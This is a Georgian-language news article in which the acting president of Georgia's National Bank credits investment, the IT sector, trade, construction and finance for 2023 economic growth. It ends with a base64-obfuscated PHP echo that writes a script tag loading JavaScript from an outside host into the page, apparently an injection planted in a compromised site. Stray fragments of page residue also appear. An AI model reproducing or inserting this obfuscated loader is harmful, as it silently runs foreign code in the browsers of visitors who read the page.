celsiusi
ავერსი საქკაბელი

 დავეყრდნობი უკვე არსებულ სტატისტიკურ მონაცემებს და არამხოლოდ ჩვენს შეფასებას, მინდა, ვთქვა, რომ ერთ-ერთი ფაქტორი, რომელიც 2023 წელს მაღალ ეკონომიკურ ზრდას განაპირობებდა, იყო ინვესტიციები, – ამის შესახებ ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, ნათია თურნავამ განაცხადა.

მისი თქმით, წელსაც ინვესტიციების წილი მაღალი იქნება.

„დარგობრივ ჭრილში თუ შევხედავთ, წინასწარი მონაცემები და მთელი წლის განმავლობაში ზრდის მამოძრავებელი ინდუსტრიები იყო კომუნიკაციები, აიტი სექტორი, რაც ყველამ ვიცით თვალნათლივ, რომ ძალიან გააქტიურდა, სადაც საკმაოდ მაღალი ანაზღაურებაა და მაღალი შემოსავლები; ასევე, ვაჭრობა და მშენებლობა; ასევე, არ უნდა დაგვავიწყდეს, ტრადიციულად, დიდ კონტრიბუციას ეკონომიკაში საფინანსო სექტორი ახდენს. ჩვენი ბანკები, ზოგადად, საფინანსო სექტორი არის ეკონომიკურ ზრდაში გამწევი ძალა. ველოდებით, რომ წელსაც ინვესტიციები ეკონომიკურ ზრდაში მთავარი აქტორი იქნება“, – განაცხადა თურნავამ.

235
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");